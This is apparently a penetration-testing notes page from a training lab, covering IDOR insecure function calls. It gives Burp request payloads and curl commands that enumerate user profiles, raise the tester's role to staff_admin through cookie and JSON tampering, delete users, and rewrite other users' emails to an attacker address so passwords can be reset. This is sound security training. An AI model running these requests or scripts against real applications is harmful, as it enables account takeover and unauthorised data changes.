INSECURE FUNCTION CALLS

this type of IDOR can be used to change another user's private information, reset another user's password, or even buy items using another user's payment information. this method requires the identification of IDOR Information Disclosure Vulnerabilities prior to full exploitation.

#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile
 Full Name:
 Email:
 About:
 
#test for information disclosure
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  GET /profile/api.php/profile/1 HTTP/1.1                  //change the /1 to /5 to test IDOR information disclosure
  Host: 94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee
  
  * on some occassions the data is in an encoded form such as:
     - data
        - contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
        - uid=MQ%3D%3D
        - uid=1
     - URL
        - /download.php?contract=MQ%3D%3D
        
 * once idor information disclosure is identified, it can be used to perform idor insecure function calls
    - try to update the other user's info and intercept the traffic via BURP
       - this will reveal the other user's hidden info such as uid, uuid, etc

#information disclosure
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"c_woodhams@employees.htb",
    "about":"I don't like quoting others!"
  }
  
 * keep modifying the parameter value until an administrator account is identified

#test security controls in place by manipulating the other parameters.
# * Change other user's uid to see if account takeover is possible
# * Create new users with arbitrary details, or delete existing users
# * Change other user's details to see if other web attacks are possible
# * Change to a more privileged role (e.g. admin) IOT perform more actions

# * HTTP Request methods
#    - PUT requests are used in APIs to update item details
#    - POST is used to create new items
#    - DELETE is used to delete items
#    - GET is used to retrieve item details.

#Change other user's uid to see if account takeover is possible
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"c_woodhams@employees.htb",
    "about":"I don't like quoting others!"
  }
  
 * unsuccessful: uuid mismatch
    - the webapp might be checking if the uuid value matches the user's uid

#Create new users with arbitrary details, or delete existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {POST} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Creating new employees is for admins only
 
#Deleting existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {DELETE} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Deleting employees is for admins only

root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {PUT} /profile/api.php/profile/{1} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role={admin}

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{admin}",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Invalid role

#identify users with privileges
#perform a manual test for use in an enumeration script
root@oco:~$ curl -G "http://94.237.59.180:35708/profile/api.php/profile/1" | grep -i "about" --color=auto

#create an enumeration script
root@oco:~$ nano script.sh
#!/bin/bash

url="94.237.59.180:35708"

for i in {1..10}; do
  # Fetch the document links for each user ID
  curl -G "http://94.237.59.180:35708/profile/api.php/profile/$i" | grep -i "about"
done

root@oco:~$ bash script.sh
 {"uid":"10","uuid":"bfd92386a1b48076792e68b596846499","role":"staff_admin","full_name":"admin","email":"admin@employees.htb","about":"Never gonna give you up, Never gonna let you down"}

#access the admin profile & takeover the admin's account or set the attacker's profile to admin
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }

#verify change and updated privileges
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }

root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/1" | grep -i "about" --color=auto
 {"uid":"1","uuid":"40f5888b67c748df7efba008e7c2f9d2","role":"staff_admin","full_name":"31137","email":"31137@employee.htb","about":"Pwned."}

#test obtained privileges
#create/delete a profile/account
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }
  
  DELETE /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=staff_admin

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }

#test obtained privileges
#modify other user's data such as email addresses - setting email addresses to an attacker specified email can be used in a password reset attack & account takeover
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{3} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{3},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }
  
  PUT /profile/api.php/profile/{3} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=staff_admin
  Connection: close

  {
    "uid":3,
    "uuid":"771409a8fb1543788fe7d91f1ea0987f",
    "role":"employee",
    "full_name":"Pwned",
    "email":"attacker@email.htb",
    "about":"Pwned."
  }

#verify changes
root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/3" | grep -i "about" --color=auto
 {"uid":"3","uuid":"771409a8fb1543788fe7d91f1ea0987f","role":"employee","full_name":"Pwned","email":"attacker@email.htb","about":"Pwned."}

#create a script that will modify all user's email addresses
#create a test command
root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/4" | grep -i "email" --color=auto
root@oco:~$ curl -X PUT "http://94.237.50.242:41103/profile/api.php/profile/4" -H "Content-Type: application/json" -H "Cookie: role=staff_admin" -d '{"uid":"4","uuid":"1a1f289428bd7ab3beb8a89d4c90b22f","email":"attacker@email.htb"}' | grep -i "email" --color=auto
 * this doesn't work yet; must do it manually for now via BURP

PreviousINFORMATION ALTERATION NextFILE INCLUSION

Last updated 3 months ago